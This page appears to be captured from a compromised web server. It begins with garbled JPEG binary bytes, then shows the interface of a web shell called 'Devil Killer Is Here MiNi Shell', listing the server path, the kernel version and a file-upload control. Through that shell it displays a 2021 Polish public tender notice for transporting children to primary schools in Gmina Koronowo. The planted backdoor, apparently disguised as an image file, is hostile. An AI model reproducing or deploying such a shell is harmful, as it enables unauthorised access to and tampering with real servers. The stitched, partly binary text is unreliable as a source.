JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210209/0000616401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00006164 z dnia 2021-02-09</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci do szkół podstawowych na terenie Gminy Koronowo w roku 2021 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejsko-Gminny Zespół Edukacji w Koronowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 091293439</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szosa Kotomierska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koronowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-010</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523822810</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@koronowo.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.koronowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka Samorządu Terytorialnego </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Miejsko-Gminny Zespół Edukacji w Koronowie</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">9670056421</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Szosa Kotomierska 3</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Koronowo</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">86-010</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">523822810</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">sekretariat@koronowo.edu.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.bip.koronowo.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci do szkół podstawowych na terenie Gminy Koronowo w roku 2021 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-226191e1-6a11-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00006164</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-02-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005975/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz dzieci do szkół podstawowych na terenie Gminy Koronowo w roku 2021</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.koronowo.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/koronowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Preferuje się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/pn/koronowo i formularza „Wyślij wiadomość do zamawiającego”. 1)	Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf2)	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:a)	.zip b)	.7Z3)	Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.4)	Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB.5)	Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. 6)	Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.7)	Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików. 8)	Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania plików oferty.9)	Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do zamawiającego”, nie za pośrednictwem adresu email.10)	Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji.11)	Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24 godziny przed terminem składania ofert/wniosków.12)	Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1. 13)	Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików. 14)	Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.15)	Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a)	Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.b)	Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. Dowóz dzieci do szkół podstawowych na terenie Gminy Koronowo w roku 2021.c)	Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej.d)	Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.e)	Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się w załączniku do SWZ.f)	Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.g)	Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:-	obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego;-	obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego.h)	W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w załączniku do SWZ  Informacje dotyczące wykonawcy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MGZE.271.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 262336,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dowóz dzieci do szkół podstawowych na terenie Gminy Koronowo w roku 2021Wtelno, Witoldowo </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 95000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-03-01 do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej. Maksymalną ilość przyznanych (obliczonych) punktów za powyższe kryterium, wynoszącą 60 otrzyma oferta o najniższej cenie. Opis kryterium wiek taboru autobusowegoWiek taboru autobusowego będzie oceniany w latach (rok ogłoszenia niniejszego postępowania tj. 2021 będzie rokiem bazowym), tj. rok produkcji wskazany w dokumencie będzie pierwszym rokiem liczonym do wieku pojazdu.Obliczenie punktów za kryterium „wiek taboru autobusowego” Zamawiający obliczy wg zasad:a) dla części 1 – Wtelno WitoldowoPrzynajmniej 2 autobusami przystosowanym do przewozu minimum 35 osób (35 miejsc siedzących), które będą wykorzystywane do przewozu uczniów. Pojazd w chwili składania oferty musi być dopuszczony do ruchu drogowego. Autobus nie może być starszy niż 15 lat.Autobus nr 1:20 pkt- autobus z 35 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),15 pkt- autobus z 35 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 35 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 35 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 35 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Autobus nr 2:20 pkt- autobus z 35 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),15 pkt- autobus z 35 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 35 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 35 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 35 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),b) Dla części 2 – Wierzchucin Królewski, SitowiecAutobus nr 1:15 pkt- autobus z 50 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),12 pkt- autobus z 50 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 50 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 50 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 50 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Autobus nr 2:15 pkt- autobus z 45 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),12 pkt- autobus z 45 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 45 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 45 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 45 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Bus/Autobus nr 3:10 pkt- bus/autobus z 6 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),8 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),5 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),3 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- bus/autobus z 6 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Maksymalna ilość punktów, jaką Wykonawca może zdobyć w kryterium „wiek taboru autobusowego” wynosi 40 pkt.Całkowita liczba punktów- suma punktów w kryterium cena i kryterium wiek taboru autobusowego.Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium wieku taboru autobusowego.Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + wiek taboru autobusowego (maks. 40)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wiek taboru autobusowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej. Maksymalną ilość przyznanych (obliczonych) punktów za powyższe kryterium, wynoszącą 60 otrzyma oferta o najniższej cenie. Opis kryterium wiek taboru autobusowegoWiek taboru autobusowego będzie oceniany w latach (rok ogłoszenia niniejszego postępowania tj. 2021 będzie rokiem bazowym), tj. rok produkcji wskazany w dokumencie będzie pierwszym rokiem liczonym do wieku pojazdu.Obliczenie punktów za kryterium „wiek taboru autobusowego” Zamawiający obliczy wg zasad:a) dla części 1 – Wtelno WitoldowoPrzynajmniej 2 autobusami przystosowanym do przewozu minimum 35 osób (35 miejsc siedzących), które będą wykorzystywane do przewozu uczniów. Pojazd w chwili składania oferty musi być dopuszczony do ruchu drogowego. Autobus nie może być starszy niż 15 lat.Autobus nr 1:20 pkt- autobus z 35 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),15 pkt- autobus z 35 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 35 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 35 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 35 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Autobus nr 2:20 pkt- autobus z 35 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),15 pkt- autobus z 35 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 35 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 35 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 35 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),b) Dla części 2 – Wierzchucin Królewski, SitowiecAutobus nr 1:15 pkt- autobus z 50 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),12 pkt- autobus z 50 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 50 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 50 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 50 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Autobus nr 2:15 pkt- autobus z 45 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),12 pkt- autobus z 45 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 45 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 45 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 45 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Bus/Autobus nr 3:10 pkt- bus/autobus z 6 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),8 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),5 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),3 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- bus/autobus z 6 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Maksymalna ilość punktów, jaką Wykonawca może zdobyć w kryterium „wiek taboru autobusowego” wynosi 40 pkt.Całkowita liczba punktów- suma punktów w kryterium cena i kryterium wiek taboru autobusowego.Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium wieku taboru autobusowego.Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + wiek taboru autobusowego (maks. 40) <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu 